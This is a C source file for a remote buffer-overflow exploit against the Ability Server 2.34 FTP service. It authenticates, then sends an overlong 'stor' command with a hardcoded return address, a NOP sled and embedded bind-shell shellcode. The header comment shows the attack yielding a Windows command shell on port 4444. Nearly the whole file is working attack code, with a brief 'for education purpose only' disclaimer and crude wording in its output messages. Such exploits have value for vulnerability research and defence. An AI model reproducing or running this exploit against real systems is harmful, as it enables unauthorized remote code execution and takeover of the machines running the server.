/*
  Ability Server 2.34 Remote Exploit      http://users.pandora.be/bratax/
  Just a basic Buffer Overflow

  Greetz go out to:  - muts @ http://www.whitehat.co.il/ for the vulnerability + example exploit
  							- kralor @ http://www.coromputer.net/ for learning me everything
                     - Sergio Alvarez for the shellcode :D

  Notes:
  	[+] For education purpose only!
   [+] You need to have access to the ftp server since the vulnerable buffer
       is located in the "stor" command.
   [+] I know there was already an exploit by muts for this vulnerability.
   	 I didn't just rewrite his Python code. I wrote the whole exploit on my own.
       I did use the same shellcode (which is originally written by Sergio Alvarez)
       and I did use the original exploit to learn more about the vulnerability.

   **************************************************
   Example:
   c:\bratax\ability>as.exe 127.0.0.1 hack me
   raping target...done
   **************************************************
   c:\bratax\ability>nc.exe 127.0.0.1 4444
   Microsoft Windows XP [versie 5.1.2600]
	(C) Copyright 1985-2001 Microsoft Corp.

	C:\bratax\ability>exit
   **************************************************
*/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#define PORT 21 // victim port
#define MAXDATASIZE 100 // max bytes we can get at once

char shellcode []=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

int main(int argc, char *argv[]){

struct hostent *he;
struct sockaddr_in their_addr;

int sockfd;

char ip[16];
char username[50];
char password[50];
char os[2];

char connectionstring[200] = "";
char connectionstring2[200] = "";
char data[1000] = "";

int x = 0, w = 0, y = 0, z = 0;
char evilrequest[3500] = ""; // vulnerable buffer + some xtra space

    WSADATA wsaData;

if (argc != 4){
	printf("\nAbility Server 2.34 Exploit by bratax\n\n");
   printf("[+] tested on WinXP SP2 Dutch Edtion - using return addy 0x7c941eed\n");
   printf("[+] spawns a shell on p4444\n");
	printf("[+] usage: %s <host> <username> <password>\n\n", argv[0]);
	exit(1);

}

	strcpy(ip, argv[1]);
	strcpy(username, argv[2]);
	strcpy(password, argv[3]);


if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
		fprintf(stderr, "WSAStartup failed.\n");
   	exit(1);
}


if ((he=gethostbyname(argv[1])) == NULL){	// get the host info
	perror("gethoscattbyname");
	exit(1);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
	perror("socket");
	exit(1);
}

their_addr.sin_family = AF_INET;	// host byte order
their_addr.sin_port = htons(PORT);	// short, network byte order
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){
	perror("connect");
	exit(1);
}

do {
	recv(sockfd, data, sizeof(data), 0);
	}
while ((strncmp (data, "220 ", 4)));

strcat(connectionstring, "user ");
strcat(connectionstring, username);
strcat(connectionstring, "\r\n");
send(sockfd,connectionstring,strlen(connectionstring),0);


do {
	recv(sockfd,data,sizeof(data),0);
	}
 while ((strncmp (data, "331 ", 4)));

strcat(connectionstring2, "pass ");
strcat(connectionstring2, password);
strcat(connectionstring2, "\r\n");
send(sockfd,connectionstring2,strlen(connectionstring2),0);

do {
	recv(sockfd,data,sizeof(data),0);
	}
while ((strncmp (data, "230", 3)));


strcpy (evilrequest, "stor ");

	printf("raping target...");
	for (w = 0; w < 969; w++){				// our giant stor-command
		evilrequest[w+5] = 'A';
	}
   evilrequest[974] = '\xed';
   evilrequest[975] = '\x1e';
   evilrequest[976] = '\x94';
   evilrequest[977] = '\x7c';
	for (w = 0; w < 100; w++){				// nops
		evilrequest[w+978] = '\x90';
	}
	for (w = 0; w < 399; w++){				// paste in the shellcode
		evilrequest[w+1078] = shellcode[w];
	}
	for (w = 0; w < 500; w++){				// don't ask me why.. still have to investigate why this
		evilrequest[w+1477] = 'B';			// is necessary :) exploit didn't seem to work otherwise
	}

	strcat(evilrequest, "\r\n");				// the final touch ;-)

	send(sockfd,evilrequest,strlen(evilrequest),0);
   printf("done");
return 0;
}